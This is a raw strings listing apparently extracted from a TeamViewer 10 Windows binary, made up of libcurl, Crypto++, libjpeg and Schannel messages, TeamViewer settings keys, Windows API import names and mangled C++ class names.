Simulate a HTTP 304 response!
%s in chunked-encoding
Rewinding stream by : %zu bytes on url %s (size = %I64d, maxdownload = %I64d, bytecount = %I64d, nread = %zd)
Excess found in a non pipelined read: excess = %zu, size = %I64d, maxdownload = %I64d, bytecount = %I64d
ioctl callback returned error %d
Rewinding stream by : %zd bytes on url %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
[^?&/:]://%c
Issue another request to this URL: '%s'
Disables POST, goes with %s
No URL set!
HTTPS
%s:%s
%sAuthorization: Basic %s
The requested URL returned error: %d
%s auth using %s with user '%s'
Referer: %s
Accept-Encoding: %s
%s, d %s M d:d:d GMT
If-Modified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Range: bytes=%s
Chunky upload is not supported by HTTP 1.0
Host: %s%s%s
Host: %s%s%s:%hu
PTF://
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
Content-Range: bytes %s%I64d/%I64d
Content-Range: bytes %s/%I64d
PTF://%s:%s@%s
The requested URL returned error: %s
Connection closure while negotiating auth (HTTP 1.0?)
HTTP error before end of send, stop sending
HTTP/%d.%d %d
Content-Type: application/x-www-form-urlencoded
Failed sending HTTP POST request
Failed sending HTTP request
HTTP/
Avoided giant realloc for header (max is %d)!
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.0 connection set to keep alive!
Lying server, not serving HTTP/2
HTTP =
RTSP/%d.%d =
HTTP 1.0, assume close after body
--:--:--
%3I64d %s %3I64d %s %3I64d %s %s %s %s %s %s %s
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
%sAuthorization: Digest %s
SOCKS4%s request granted.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
SOCKS4 communication to %s:%d
SOCKS4 connect to %s (locally resolved)
Failed to resolve "%s" for SOCKS4 connect.
User was rejected by the SOCKS5 server (%d %d).
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
Can't complete SOCKS5 connection to xx:xx:xx:xx:xx:xx:xx:xx:%d. (%d)
Failed to resolve "%s" for SOCKS5 connect.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %s:%d. (%d)
login
password
%s%s%s
CONNECT %s HTTP/%s
%s%s%s%s
Establish HTTP proxy tunnel to %s:%hu
%s:%hu
%s%s%s:%hu
Host: %s
HTTP/1.%d %d
TUNNEL_STATE switched to: %d
Received HTTP code %d from proxy after CONNECT
%sAuthorization: NTLM %s
%d.%d.%d.%d
FTP: The server failed to connect to data port
FTP: Accepting server connect has timed out
FTP: The server did not accept the PRET command.
FTP: unknown PASS reply
FTP: unknown PASV reply
FTP: unknown 227 response format
FTP: can't figure out the host in the PASV response
Unsupported protocol
URL using bad/illegal format or missing URL
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
FTP: weird server reply
FTP: command PORT failed
FTP: command REST failed
Error in the HTTP2 framing layer
FTP: couldn't set file type
FTP: couldn't retrieve (RETR failed) the specified file
HTTP response code said error
An unknown option was passed in to libcurl
SSL peer certificate or SSH remote key was not OK
Operation was aborted by an application callback
A libcurl function was given a bad argument
Issuer check against peer certificate failed
Login denied
TFTP: File Not Found
TFTP: Access Violation
Problem with the local SSL certificate
Peer certificate cannot be authenticated with given CA certificates
Problem with the SSL CA cert (path? access rights?)
Unrecognized or bad HTTP Content or Transfer-Encoding
Invalid LDAP URL
Error in the SSH layer
Unable to parse FTP file list
SSL public key does not match pinned public key
TFTP: Illegal operation
TFTP: Unknown transfer ID
TFTP: No such user
Caller must register CURLOPT_CONV_ callback options
CURLSHcode unknown
SSL server certificate status verification FAILED
Please call curl_multi_perform() soon
Protocol option is unsupported
Protocol is unsupported
Socket is unsupported
Operation not supported
Address family not supported
Protocol family not supported
Winsock version not supported
SEC_E_CERT_UNKNOWN
SEC_E_CERT_WRONG_USAGE
Unknown error %d (%#x)
SEC_E_CERT_EXPIRED
SEC_E_KDC_CERT_EXPIRED
SEC_E_KDC_CERT_REVOKED
SEC_E_NO_KERB_KEY
SEC_E_NO_S4U_PROT_SUPPORT
SEC_E_SMARTCARD_CERT_EXPIRED
SEC_E_SMARTCARD_CERT_REVOKED
SEC_E_STRONG_CRYPTO_NOT_SUPPORTED
SEC_E_QOP_NOT_SUPPORTED
SEC_E_UNSUPPORTED_FUNCTION
SEC_E_UNSUPPORTED_PREAUTH
SEC_E_ILLEGAL_MESSAGE (0xXX) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.
%s (0xXX)
%s - %s
schannel: SSL/TLS connection with %s port %hu (step 1/3)
schannel: checking server certificate revocation
schannel: disable server certificate revocation checks
schannel: verifyhost setting prevents Schannel from comparing the supplied target name with the subject names in server certificates. Also disables SNI.
schannel: a client certificate has been requested
schannel: SNI or certificate check failed: %s
schannel: AcquireCredentialsHandle failed: %s
schannel: using IP address, SNI is not supported by OS.
schannel: initial InitializeSecurityContext failed: %s
schannel: SSL/TLS connection with %s port %hu (step 2/3)
schannel: incremented credential handle refcount = %d
select/poll on SSL/TLS socket, errno: %d
schannel: next InitializeSecurityContext failed: %s
schannel: SSL/TLS connection with %s port %hu (step 3/3)
schannel: Curl_read_plain returned error %d
select/poll on SSL socket, errno: %d
schannel: Curl_read_plain returned CURLE_AGAIN
schannel: Curl_read_plain returned CURLE_RECV_ERROR
schannel: shutting down SSL/TLS connection with %s port %hu
schannel: ApplyControlToken failure: %s
schannel: failed to send close msg: %s (bytes written: %zd)
schannel: decremented credential handle refcount = %d
schannel: failed to read data from server: %s
%c%c==
%c%c%c=
%c%c%c%c
%sAuthorization: Negotiate %s
.jpeg
.html
Content-Type: multipart/mixed; boundary=%s
Content-Type: %s
couldn't open file "%s"
--%s--
; filename="%s"
%s; boundary=%s
------------------------xx
%s/%s
NTLM handshake failure (type-3 message): Status=%x
User was rejected by the SOCKS5 server (%u %u).
Invalid SSPI authentication response type (%u %u).
SOCKS5 server authencticated user %s with GSS-API.
SSPI error: %s failed: %s
Invalid SSPI encryption response type (%u %u).
SOCKS5 server supports GSS-API %s data protection.
SOCKS5 access with%s protection granted.
LOGIN
warning: %s
notification: %s
warning: %s %d
Fatal (internal) error in %s, line %d: %s
assertion failed: st->windowSize-st->frameSize == st->subframeSize
Xiph.Org libtheora 1.1 20090822 (Thusnelda)
Line %d, Column %d
CStorageRegistry::CreateKey(): RegCreateKey failed
CStorageRegistry::DeleteKey(): RegDeleteKey failed
KERNEL32.DLL
Process::GetTerminalServerPipe(): FindFirstFile failed
ProcessWin::GetTerminalServerPipe(): FindNextFile() failed
ProcessWin::GetTerminalServerPipe(): no pipe found!
ProcessWin::GetTerminalServerPipe():: WaitNamedPipe()
ProcessWin::GetTerminalServerPipe():: CreateFile()
ProcessWin::CreateRemoteSessionProcess(): first write pipe failed!
ProcessWin::CreateRemoteSessionProcess(): read pipe failed!
ProcessWin::ElevateProcess(): ShellExecuteEx
{Not-any-thread}StreamTransformation: this object doesn't support random access
: this object doesn't support resynchronization
CryptoMaterial: this object does not support precomputation
GeneratableCryptoMaterial: this object does not support key/parameter generation
PK_MessageEncodingMethod: this signature scheme does not support message recovery
1.2.5
PolicyPublicKey
PasswordStrength
RemoteControlSendKeyCombinations
MeetingPasswordForInstantMeeting
WindowsLogon
RandomPasswordAfterSession
FullAccessThroughWindowsLogon
TempSaveConnectionPasswords
LogIncomingConnections
UseUDP
JoinMeeting
Port
cmdLineArgs empty!
StoredDataKeyHandle: no key set
StoredDataKeyHandle: invalid wrapping key
BuddyListKeyStore: Trying to add existing Key
BuddyListKeyStore: key does not exist
SRP::CreatePasswordVerifier: SRP with empty password
StoredDataCipherRSA: Non RSA key in RSA crypto
StoredDataCipherRSA: key is not decryption key!
CipherSymetricAuthenticatedBase: Non AES key in AES crypto
StoredDataKeyAES: Invalid Keylength for AES Key: %1%
StoredDataKeyAES: randomData too short for AES Key: %1% (needs at least 32)
StoredDataKeyRSA: empty key import
StoredDataKeyRSA: invalid public key
StoredDataKeyRSA: invalid private key
UnpackKey: not enought data
Key too large to pack (>65kb)
UnpackKey: invalid header
UnpackKey: wrong length
Could not load PublicKey, error: "%1%"
Could not load PrivateKey, error: "%1%"
CryptoMAC::CryptoMAC: invalid key length
CryptoMAC::CryptoMAC: Key is of the wrong type
StoredDataEncryptionLowLevel::ImportPublicKey: not a valid key to import!
StoredDataEncryptionLowLevel::DecryptData: wrapping key used!
StoredDataEncryptionLowLevel::ExportSecretKey: Data key used for Export!
StoredDataEncryptionLowLevel::EncryptData: wrapping key used!
StoredDataEncryptionLowLevel::ImportKey: No decryption key available!
StoredDataEncryptionLowLevel::ImportKey: Data key used for Import!
StoredDataKey::GetKeyType: invalid key (no header)
StoredDataKey::GetKeyType: invalid keytype
StoredDataKey::GetKeyType: invalid key (header missmatch)
Key too large
StoredDataKeyStore: Reuse of Key ID
StoredDataKeyFactory::CreateWellKnownKey: unknown key
StoredDataKeyFactory::ImportKey: invalid keytype
CreateCipher: Unknown KeyType
StoredDataKeyPassword:: invalid requested keylength
StoredDataKeyLegacy::ExportFullKey: The method or operation is not implemented.
StoredDataKeyLegacy::ExportEncryptionKey: The method or operation is not implemented.
StoredDataCipherAES: Non AES key in AES crypto
StoredDataCipherPassword: Non Password key in Password crypto
StoredDataCipherPassword::Decrypt: invalid ciphertext
StoredDataCipherPassword::Decrypt: invalid ciphertext (too small)
StoredDataCipherLegacy: Non Legacy key in Legacy crypto
SignatureRSA::SignatureRSA: Non RSA Key in RSA Crypto
RegCreateKeyTransactedW
RegDeleteKeyExW
RegDeleteKeyTransactedW
,"InstantSupportID":
,"InstantSupportNote":
CConnectionThread::CmdDataDirected(): no commandhandler found for remoteSessionID=
CT.ProcessCmdUDPFlushSendBuffer: globalIDs.size() != #parsed ccmds
CT.CheckForValidCmdUDPFlushSendBuffer(): length < globalIDs
CT.CheckForValidCmdUDPFlushSendBuffer(): length < serializedBufferSize
CT.CheckForValidCmdUDPFlushSendBuffer(): length < sizeof(UINT16)
CT.CheckForValidCmdUDPFlushSendBuffer(): length < headerSize
KeepAliveThreadServer.ProcessData.Received CMD_BUDDY from
command.ulLength=
<?xml version="1.0"?><cross-domain-policy><site-control permitted-cross-domain-policies="all"/><allow-access-from domain="*.teamviewer.com" to-ports="5938" /></cross-domain-policy>
GWT.CmdUDPPing.PunchReceived, a=
GWT.CmdUDPPing.PR.SendUDPPunches.Failed, Err=
GWT.UDPFlowUDPPrepareSwitchToUDP.Send.Failed, Err=
GWT.UDPFlowUDPSendPossible.SendTCPHTTP.Failed, Err=
GWT.CmdUDPPing.MTUFailed, Err=
GWT.CmdUDPPing.PR.Send.Failed, Err=
GWT.UDPFlowPunchReceived.SendUDP1.Failed, Err=
GWT.UDPFlowPunchReceived.SendUDP2.Failed, Err=
GWT.UDPFlowMTUReceived.SendTCPHTTP.Failed, Err=
CPseudoRouter::ExecuteCommand: unexpected command
0.0.0.0
tv_w32.dll
MagSetWindowSource
CURLOPT_PRIVATE
CURLOPT_DEBUGFUNCTION
CURLOPT_CONNECTTIMEOUT
CURLOPT_URL
CURLOPT_ERRORBUFFER
CURLOPT_VERBOSE
CURLOPT_USERAGENT
CURLOPT_READDATA
CURLOPT_POSTFIELDS
CURLOPT_UPLOAD
CURLOPT_READFUNCTION
CURLOPT_HTTPHEADER
CURLOPT_POSTFIELDSIZE_LARGE
CURLOPT_CUSTOMREQUEST
CURLOPT_MAXREDIRS
CURLOPT_FOLLOWLOCATION
CURLOPT_TIMEOUT
CURLOPT_WRITEFUNCTION
CURLOPT_WRITEDATA
CURLOPT_HEADERFUNCTION
CURLOPT_HEADERDATA
CURLOPT_SSLKEY
CURLOPT_PROXYPASSWORD
CURLOPT_PROXYUSERNAME
CURLOPT_SSLCERT
CURLOPT_SSL_VERIFYPEER
CURLOPT_PROXYAUTH
CURLOPT_HTTPPROXYTUNNEL
CURLOPT_PROXYPORT
CURLOPT_PROXY
CURLOPT_SEEKDATA
CURLOPT_POST
CURLOPT_CONNECT_ONLY
CURLOPT_SEEKFUNCTION
curl_multi_init failed
CURLOPT_CLOSESOCKETFUNCTION
CURLOPT_CLOSESOCKETDATA
CURLOPT_SHARE
CURLOPT_OPENSOCKETFUNCTION
CURLOPT_OPENSOCKETDATA
curl_share_init failed
CurlMulti: curl_multi_setopt(
CURLMOPT_SOCKETFUNCTION
CURLMOPT_SOCKETDATA
CURLMOPT_TIMERFUNCTION
CURLMOPT_TIMERDATA
Ack handler not supported because CCommand V2 is not supported
Error when trying to curl_easy_init() a handle
KeySize
NullRNG: NullRNG should only be passed to functions that don't need to generate random bytes
: this object does't support a special last block
: this object doesn't support multiple channels
is not a valid key length
InvertibleRSAFunction: computational error during private key operation
InvertibleRSAFunction: input is not a valid RSA private key
for this public key
: this key is too short to encrypt any messages
TF_SignerBase: this algorithm does not support messsage recovery or the key is too short
for this key
TF_SignerBase: the recoverable message part is too long for the given key and algorithm
PK_Signer: key too short for this signature scheme
operation failed with error
key is set
setting key and IV
is not a supported cipher block size
ntdll.dll
kernel32.dll
Wrong Password
SELECT * FROM Win32_OperatingSystem
Error creating windows events
00000000
Certificate::Serialize: !IsValid()
GetCertificateType: !IsValid()
GetCertificateID: !IsValid()
GetPublicKey: !IsValid()
CertificateMachine::GetProviderIDs: !IsValid()
CertificateMachine::GetDyngateID: !IsValid()
CertificationAuthority::SignCertificate: invalid Certificate to sign
CertificationAuthority::SignCertificate: could not sign Certificate (Error: %1%)
tvprint::PrintingDataAcceptorTCP::ConsumeCommand
7.0.0.1
255.0.0.0
\\.\Global\
TeamViewerPublicKeyAuthentication
CCmdDataStream::ValidityCheck(): not enough data: %1%
E:\TeamViewer_Workspace\TeamViewer_10.0_Release\BuildTarget\QS_Release2013\TeamViewer.pdb
WinHttpOpen
WinHttpSetOption
WinHttpGetDefaultProxyConfiguration
GdiplusShutdown
GetKeyState
GetAsyncKeyState
MsgWaitForMultipleObjectsEx
CreateDialogIndirectParamW
MsgWaitForMultipleObjects
GetViewportOrgEx
SetViewportOrgEx
EnumPortsW
RegCloseKey
RegOpenKeyExW
ShellExecuteW
ShellExecuteExW
WinHttpCloseHandle
WinHttpConnect
WinHttpOpenRequest
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpQueryAuthSchemes
WinHttpSetCredentials
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpQueryHeaders
CertGetNameStringW
CertFreeCertificateContext
CryptHashCertificate
ImageEnumerateCertificates
ImageGetCertificateHeader
ImageGetCertificateData
CryptCATCatalogInfoFromContext
ExitWindowsEx
GetKeyboardLayout
GetKeyboardState
MapVirtualKeyW
ActivateKeyboardLayout
VkKeyScanExW
SetWindowsHookExW
UnhookWindowsHookEx
EnumChildWindows
RegCreateKeyW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegCreateKeyExW
RegFlushKey
SetupDiOpenDevRegKey
WinHttpAddRequestHeaders
WinHttpWriteData
GetProcessHeap
CreateIoCompletionPort
SetProcessShutdownParameters
KERNEL32.dll
WaitNamedPipeW
GetWindowsDirectoryW
SetThreadExecutionState
GetCPInfo
PeekNamedPipe
Maximum supported image dimension is %u pixels
Cannot transcode due to multiple use of quantization table %d
Arithmetic table 0xx was not defined
Backing store not supported
Huffman table 0xx was not defined
Quantization table 0xx was not defined
Not a JPEG file: starts with 0xx 0xx
Insufficient memory (case %d)
Cannot quantize more than %d color components
Cannot quantize to fewer than %d colors
Cannot quantize to more than %d colors
Unsupported JPEG process: SOF type 0xx
Failed to create temporary file %s
Unsupported marker type 0xx
Unknown APP0 marker (not JFIF), length %u
Adobe APP14 marker: version %d, flags 0xx 0xx, transform %d
Unknown APP14 marker (not Adobe), length %u
Define Arithmetic Table 0xx: 0xx
Define Huffman Table 0xx
Define Quantization Table %d precision %d
Define Restart Interval %u
Freed EMS handle %u
Obtained EMS handle %u
= = = = = = = =
JFIF APP0 marker: version %d.d, density %dx%d %d
Warning: thumbnail image size does not match data length %u
JFIF extension marker: type 0xx, length %u
with %d x %d thumbnail image
Miscellaneous marker 0xx, length %u
Unexpected marker 0xx
%4u %4u %4u %4u %4u %4u %4u %4u
Quantizing to %d = %d*%d*%d colors
Quantizing to %d colors
Selected %d colors for quantization
At marker 0xx, recovery action %d
RST%d
Smoothing not supported with nonstandard sampling ratios
Start Of Frame 0xx: width=%u, height=%u, components=%d
Component %d: %dhx%dv q=%d
Start Of Scan: %d components
Component %d: dc=%d ac=%d
Ss=%d, Se=%d, Ah=%d, Al=%d
Closed temporary file %s
Opened temporary file %s
JFIF extension marker: palette thumbnail image, length %u
JFIF extension marker: JPEG-compressed thumbnail image, length %u
JFIF extension marker: RGB thumbnail image, length %u
Unrecognized component IDs %d %d %d, assuming YCbCr
Freed XMS handle %u
Obtained XMS handle %u
Unknown Adobe color transform code %d
Corrupt JPEG data: %u extraneous bytes before marker 0xx
Inconsistent progression sequence for component %d coefficient %d
Warning: unknown JFIF revision number %d.d
Corrupt JPEG data: found marker 0xx instead of RST%d
Bogus message code %d
Invalid component ID %d in SOS
DCT scaled block size %dx%d not supported
Component index %d: mismatching sampling ratio %d:%d, %d:%d, %c
Wrong JPEG library version: library is %d, caller expects %d
Invalid memory pool code %d
Unsupported JPEG data precision %d
Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d
Invalid progressive parameters at scan script entry %d
Invalid scan script at entry %d
Improper call to JPEG library in state %d
JPEG parameter struct mismatch: library thinks size is %u, caller expects %u
Buffer passed to JPEG library is too small
Too many color components: %d, max %d
Unsupported color conversion request
Bogus DAC index %d
Bogus DAC value 0x%x
Bogus DHT index %d
Bogus DQT index %d
Empty JPEG image (DNL not supported)
%ld%c
zcÁ
.?AVwindows_file_codecvt@@
.?AV?$bind_t@V?$vector@V?$basic_option@D@program_options@boost@@V?$allocator@V?$basic_option@D@program_options@boost@@@std@@@std@@V?$mf1@V?$vector@V?$basic_option@D@program_options@boost@@V?$allocator@V?$basic_option@D@program_options@boost@@@std@@@std@@Vcmdline@detail@program_options@boost@@AAV?$vector@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V?$allocator@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2@@2@@_mfi@boost@@V?$list2@V?$value@PAVcmdline@detail@program_options@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@5@@_bi@boost@@
.?AV?$sp_counted_impl_pd@PAVLoginKeyStorageSettings@Detail@tvguibackend@@V?$sp_ms_deleter@VLoginKeyStorageSettings@Detail@tvguibackend@@@detail@boost@@@detail@boost@@
.?AVLoginKeyStorageSettings@Detail@tvguibackend@@
.?AVILoginKeyStorageStrategy@Detail@tvguibackend@@
.?AV?$sp_ms_deleter@VLoginKeyStorageSettings@Detail@tvguibackend@@@detail@boost@@
.?AVTicky@MultimediaPipeline@@
.?AVData@MultimediaPipeline@@
.?AVPacketData@MultimediaPipeline@@
.?AVSyncData@MultimediaPipeline@@
.?AVDataTypeSyncData@MultimediaPipeline@@
.?AVDataType@MultimediaPipeline@@
.?AV?$sp_counted_impl_p@VCSendFileModule_Server@tvremotesupport@@@detail@boost@@
.?AV?$sp_counted_impl_p@VLoginToken@tvencrypt@@@detail@boost@@
.?AVControlData@MultimediaPipeline@@
.?AVControlDataEndOfStream@MultimediaPipeline@@
.?AVDataTypeControlData@MultimediaPipeline@@
.?AVForwardingFilter@MultimediaPipeline@@
.?AVIFilter@MultimediaPipeline@@
.?AVFusionData@MultimediaPipeline@@
.?AVDataTypeFusion@MultimediaPipeline@@
.?AV?$sp_counted_impl_p@VControlDataSenderStatus@MultimediaPipeline@@@detail@boost@@
.?AV?$sp_counted_impl_p@VPipeInputPort@MultimediaPipeline@@@detail@boost@@
.?AV?$sp_counted_impl_p@VShuttingPipe@MultimediaPipeline@@@detail@boost@@
.?AV?$enable_shared_from_this@VShuttingPipe@MultimediaPipeline@@@boost@@
.?AVShuttingPipe@MultimediaPipeline@@
.?AVIPipe@MultimediaPipeline@@
.?AV?$bind_t@XV?$mf1@XVShuttingPipe@MultimediaPipeline@@ABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VShuttingPipe@MultimediaPipeline@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@VSyncData@MultimediaPipeline@@@detail@boost@@
.?AV?$sp_counted_impl_p@VPCMAudioDataReframeFilter@MultimediaPipeline@@@detail@boost@@
.?AV?$enable_shared_from_this@VPCMAudioDataReframeFilter@MultimediaPipeline@@@boost@@
.?AVPCMAudioDataReframeFilter@MultimediaPipeline@@
.?AVDataTypeStreamData@MultimediaPipeline@@
.?AV?$bind_t@XV?$mf0@XVPCMAudioDataReframeFilter@MultimediaPipeline@@@_mfi@boost@@V?$list1@V?$value@PAVPCMAudioDataReframeFilter@MultimediaPipeline@@@_bi@boost@@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf1@XVClock@MultimediaPipeline@@I@_mfi@boost@@V?$list2@V?$value@PAVClock@MultimediaPipeline@@@_bi@boost@@V?$value@H@23@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVPCMAudioDataReframeFilter@MultimediaPipeline@@I_N@_mfi@boost@@V?$list3@V?$value@PAVPCMAudioDataReframeFilter@MultimediaPipeline@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AVISinkFilter@MultimediaPipeline@@
.?AVIProcessor@MultimediaPipeline@@
.?AV?$sp_counted_impl_p@VRemoteAudioReceiverToPipelineAdapter@tvmultimedia@@@detail@boost@@
.?AV?$sp_counted_impl_pd@PAVDelegatingFilter@MultimediaPipeline@@V?$sp_ms_deleter@VDelegatingFilter@MultimediaPipeline@@@detail@boost@@@detail@boost@@
.?AV?$sp_ms_deleter@VDelegatingFilter@MultimediaPipeline@@@detail@boost@@
.?AV?$sp_counted_impl_p@VControlDataReset@MultimediaPipeline@@@detail@boost@@
.?AV?$sp_counted_impl_p@VControlDataEndOfStream@MultimediaPipeline@@@detail@boost@@
.?AVRemoteAudioReceiverToPipelineAdapter@tvmultimedia@@
.?AVPipelineJitterBufferPacketData@tvmultimedia@@
.?AV?$sp_counted_impl_p@VDelegatingFilter@MultimediaPipeline@@@detail@boost@@
.?AV?$sp_counted_impl_pd@PAV?$ResultAndErrorCallback@V?$shared_ptr@ULoginResult@Account@tvguibackend@@@boost@@@tvguibackend@@V?$sp_ms_deleter@V?$ResultAndErrorCallback@V?$shared_ptr@ULoginResult@Account@tvguibackend@@@boost@@@tvguibackend@@@detail@boost@@@detail@boost@@
.?AV?$sp_counted_impl_pd@PAVRequestInstantSupportSessionLogic@tvgui@@V?$sp_ms_deleter@VRequestInstantSupportSessionLogic@tvgui@@@detail@boost@@@detail@boost@@
.?AV?$enable_shared_from_this@VInstantSupportCase@tvgui@@@boost@@
.?AVInstantSupportCase@tvgui@@
.?AVSupportSessionIdentifier@tvhelper@@
.?AV?$bind_t@XV?$mf3@XVInstantSupportCase@tvgui@@_NABV?$function@$$A6AX_N@Z@boost@@_N@_mfi@boost@@V?$list4@V?$value@PAVInstantSupportCase@tvgui@@@_bi@boost@@V?$value@_N@23@V?$value@V?$function@$$A6AX_N@Z@boost@@@23@V423@@_bi@3@@_bi@boost@@
.?AV?$bind_t@XV?$mf2@XVInstantSupportCase@tvgui@@ABVSupportSessionIdentifier@tvhelper@@ABUInstantSupportData@4@@_mfi@boost@@V?$list3@V?$value@V?$shared_ptr@VInstantSupportCase@tvgui@@@boost@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$sp_ms_deleter@V?$ResultAndErrorCallback@V?$shared_ptr@ULoginResult@Account@tvguibackend@@@boost@@@tvguibackend@@@detail@boost@@
.?AV?$sp_ms_deleter@VRequestInstantSupportSessionLogic@tvgui@@@detail@boost@@
.?AV?$bind_t@XV?$mf0@XVInstantSupportCase@tvgui@@@_mfi@boost@@V?$list1@V?$value@V?$shared_ptr@VInstantSupportCase@tvgui@@@boost@@@_bi@boost@@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@VHttpRequest@tvasiolib@@@detail@boost@@
.?AV?$sp_counted_impl_p@VHttpClient@tvasiolib@@@detail@boost@@
.?AV?$sp_counted_impl_p@VHiddenWebBrowserWindowPreventingJScriptUnloadingWin@tvgui@@@detail@boost@@
.?AV?$CWindowImpl@VHiddenWebBrowserWindowPreventingJScriptUnloadingWin@tvgui@@VCWindow@ATL@@V?$CWinTraits@$0A@$0A@@4@@ATL@@
.?AVHiddenWebBrowserWindowPreventingJScriptUnloadingWin@tvgui@@
.?AV?$sp_counted_impl_p@Vinvocation_state@?$signal_impl@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@ZV?$optional_last_value@X@signals2@boost@@HU?$less@H@std@@V?$function@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@Z@6@V?$function@$$A6AXABVconnection@signals2@boost@@W4eCmd@CBuddyClientReceive@tvgui@@PAX@Z@6@Vmutex@56@@detail@signals2@boost@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$grouped_list@HU?$less@H@std@@V?$shared_ptr@V?$connection_body@U?$pair@W4slot_meta_group@detail@signals2@boost@@V?$optional@H@4@@std@@V?$slot@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@ZV?$function@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@Z@boost@@@signals2@boost@@Vmutex@45@@detail@signals2@boost@@@boost@@@detail@signals2@boost@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$connection_body@U?$pair@W4slot_meta_group@detail@signals2@boost@@V?$optional@H@4@@std@@V?$slot@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@ZV?$function@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@Z@boost@@@signals2@boost@@Vmutex@45@@detail@signals2@boost@@@detail@boost@@
.?AV?$connection_body@U?$pair@W4slot_meta_group@detail@signals2@boost@@V?$optional@H@4@@std@@V?$slot@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@ZV?$function@$$A6AXW4eCmd@CBuddyClientReceive@tvgui@@PAX@Z@boost@@@signals2@boost@@Vmutex@45@@detail@signals2@boost@@
.?AV?$sp_counted_impl_p@VFusionData@MultimediaPipeline@@@detail@boost@@
.?AV?$sp_counted_impl_p@VData@MultimediaPipeline@@@detail@boost@@
.?AV?$sp_counted_impl_p@VInjectionFilter@MultimediaPipeline@@@detail@boost@@
.?AV?$enable_shared_from_this@VInjectionFilter@MultimediaPipeline@@@boost@@
.?AVInjectionFilter@MultimediaPipeline@@
.?AV?$bind_t@XV?$mf1@XVInjectionFilter@MultimediaPipeline@@ABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@_mfi@boost@@V?$list2@V?$value@PAVInjectionFilter@MultimediaPipeline@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AVControlDataReset@MultimediaPipeline@@
.?AVDataFusionFilter@MultimediaPipeline@@
.?AV?$sp_counted_impl_p@VDataSplitterFilter@MultimediaPipeline@@@detail@boost@@
.?AV?$enable_shared_from_this@VDataSplitterFilter@MultimediaPipeline@@@boost@@
.?AVDataSplitterFilter@MultimediaPipeline@@
.?AV?$bind_t@XV?$mf2@XVDataSplitterFilter@MultimediaPipeline@@I_N@_mfi@boost@@V?$list3@V?$value@PAVDataSplitterFilter@MultimediaPipeline@@@_bi@boost@@U?$arg@$00@3@U?$arg@$01@3@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@VDistributionPipe@MultimediaPipeline@@@detail@boost@@
.?AV?$enable_shared_from_this@VDistributionPipe@MultimediaPipeline@@@boost@@
.?AVDistributionPipe@MultimediaPipeline@@
.?AV?$bind_t@XV?$mf1@XVDistributionPipe@MultimediaPipeline@@ABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@_mfi@boost@@V?$list2@V?$value@V?$shared_ptr@VDistributionPipe@MultimediaPipeline@@@boost@@@_bi@boost@@U?$arg@$00@3@@_bi@3@@_bi@boost@@
.?AV?$sp_counted_impl_p@V?$connection_body@U?$pair@W4slot_meta_group@detail@signals2@boost@@V?$optional@H@4@@std@@V?$slot@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@ZV?$function@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@Z@2@@signals2@boost@@Vmutex@45@@detail@signals2@boost@@@detail@boost@@
.?AV?$sp_counted_impl_p@V?$grouped_list@HU?$less@H@std@@V?$shared_ptr@V?$connection_body@U?$pair@W4slot_meta_group@detail@signals2@boost@@V?$optional@H@4@@std@@V?$slot@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@ZV?$function@$$A6AXABV?$shared_ptr@VData@MultimediaPipeline@@@boost@@@Z@2@@signals2@boost@@Vmutex@45@@detail@signals2@boost@@@boost@@@detail@signals2@boost@@@detail@boost@@
